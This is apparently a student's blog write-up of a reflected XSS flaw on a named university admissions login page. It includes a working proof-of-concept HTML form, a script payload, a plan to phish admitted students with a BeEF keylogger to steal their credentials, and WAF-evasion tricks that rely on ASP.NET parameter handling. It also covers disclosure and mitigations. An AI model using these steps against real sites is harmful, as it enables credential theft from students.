Real-Life Simple XSS Walkthrough

Jennings Zhang

Expectations: you should already know basic HTML and HTTP. (that’s it)

Our target:

https://ugadmissions.northeastern.edu/ApplicantApp/ApplicantAppLogin.asp

Game Plan

  1. make the website produce an error message
  2. spoof the request so that you can customize the error message
  3. Include malicious code in the error message
  4. Create a HTML website that links to your malicious code
  5. Send to 12th graders

See also: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

Reverse Engineering

Many combinations of form data are possible. Format is checked client side, but whether or not an account actually exists can only be checked against the remote database. First, submit valid credentials for a fake account.

That seems redundant, why are two POSTs being made and not just one? Looking at the first response from applicantapplogincheck.asp, it returns something in HTML (purpose unknown) and this hidden form below:

<input type='hidden' name='FormAction' value='Reset'><Body onload='javascript:document.forms[0].submit()'><form name='ApplicantAppLoginCheck' method='post' action='ApplicantAppLogin.asp'><input type='hidden' name='errormsg' value='Applicant not found. Please check your NU ID and password'><input type='hidden' name='logintoken' value=''><input type='hidden' name='admissionsdataid' value=''></form>

Oh okay. That redirects to ApplicantAppLogin.asp with the key “errormsg” in the POST body.

What if. We just copied and pasted that form above and played with it? This is the red flag. Whenever you see text in the request that appears word-for-word in the webpage too, there is a chance that something is breakable.

<html>
<head><title>nu ugadmissions custom xss</title></head>
<body>
<form action="https://ugadmissions.northeastern.edu/ApplicantApp/ApplicantAppLogin.asp" method="post">
<em>errormsg: </em>
<input type="text" name="errormsg">
<input type="hidden" name="logintoken">
<input type="hidden" name="admissionsdataid">
<input type="submit">
</form>
</body>
</html>

Opening this document in the browser, we get an input text field. Whatever we type is inserted as HTML into the actual site at ApplicantAppLogin.asp without server-side sanitation. If we type <script>…, it is possible to execute arbitrary code in the context of a victim’s session on northeastern.edu.

<script>alert(‘dftba’)</script>

Weaponization

Reminder: Google what you don’t know!

It is easiest to use the BeEF Exploitation Framework. Include a keylogger in errormsg. POST hides our malicious payload in the HTTP body, so it is unlikely for users to notice anything fishy. Put this in a hidden form on a phishing site and use a URL shortener (e.g. bit.ly) to obfuscate the link. Post that link in one of those Facebook groups like “Northeastern University Admitted Class of 2024!!!” Collect login credentials.

As for evil ideas, we could change their majors to something under CSSH. Maybe the boost in enrollment might help the department with funding!

Mitigation

This login process seems redundant, why two POST instead of one? Moreover, server-side validation is crucial. No incoming data can be trusted.

Content-Security-Policy and X-XSS-Protection are simple safety measures that can help.

There are hundreds of known XSS attacks. Security professionals use fuzzers to automatically test all of them on every endpoint.

Google Chrome can block naive XSS attacks like this (where the payload appears in the request verbatim, however it’s easy to work around this). Firefox 68 is vulnerable.

As always, google is your friend. https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

NU’s Response

I “responsibly disclosed” the vulnerability via email with a thorough explanation to my CS fundies teacher (Alan Mislove), who got me in touch with the Office of Information Security at Northeastern. Both them and I were surprised by this, because they should have had a web application firewall (WAF) for protection.

After two weeks, it seems like the WAF is working. The WAF filters strings using a negative security model, aka blacklist. This bug won’t work anymore, however HTML injection is still possible.

WAF Attack

Hacking is illegal, nor am I being paid. Though I should’ve stopped now, let’s try a few more tricks before giving up.

Let’s do some research first:

In a different situation, we would want to first do reconnaissance. I’m skipping recon because I don’t want to get sued. We already know a few things. Most importantly,

  • a web application firewall is filtering strings
  • the server programming language is ASP.NET

What are the exact patterns that are blocked? Let’s try a few.

  1. <script
  2. javascript
  3. alert(
  4. <img src=

It’s most likely that the WAF runs before ASP code, which is a security risk because obfuscated payloads can bypass the WAF and be processed into valid bugs by ASP.NET.

ASP.NET removes invalid “%” symbols. “errormsg=h%%ey%” becomes “hey”.

ASP.NET concatenates duplicates in the query string. For example, “errormsg=hey&errormsg=you” will be changed to “hey, you”. By the way, this might be able to bypass Chrome’s XSS detection.

errormsg=alert(+%2F*&errormsg=*%2F+%27hey%27) =>
alert( /*, */ 'hey')

Given more time and resources, I’m sure that there is some creative solution that can break through. However, I haven’t figured it out.

Reflection

KOLB’S EXPErieNtiAL leARniNg cycLe

When I first discovered this bug in April of 2018, it was a simpler GET request. My report to the Registrar was unanswered though a week later, the problem was lazily “fixed.” Two server-side functions are relevant: one to produce the error message, and one to show the error message. That show function was disabled. Consequentially, no error messages for invalid logins were shown, which is a poor user experience. Note that the produce error function was never changed nor disabled. Under some conditions, it would still get called. Obsolete code is evidence of technical debt.

I rediscovered this bug a year later in July of 2019. It’s messier than I initially thought. The same flaw exists because the developers failed to write reusable code. Instead of abstracting common functionality as a single function, the unsafe code to show the error message was copied and pasted into different parts of the back-end. One occurrence of the code was fixed, but unfortunately a second occurrence of it was still exposed. This time, a second function to produce the error from an HTML form using POST was being used. This is more convenient for a nefarious hacker, actually. Malicious code is hidden in the request header, so that victims are very unlikely to notice the payload.

Thanks to Alan Mislove for helping me bring the issue to the right person. After a year of going unnoticed, it took another month for someone to fix this textbook example of XSS with a band-aid solution.

Firewalls reduce the burden on developers to adhere with good security practices. Ideally, a firewall acts as secondary protection and should be no excuse for bad code.

Everyone who writes code ought to be weary of “red flags” in cybersecurity like these. I hope this write-up demonstrates that reverse-engineering of public-facing web apps can be terrifyingly easy.

Jennings Zhang

Written by

Computer Science/Biology student

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade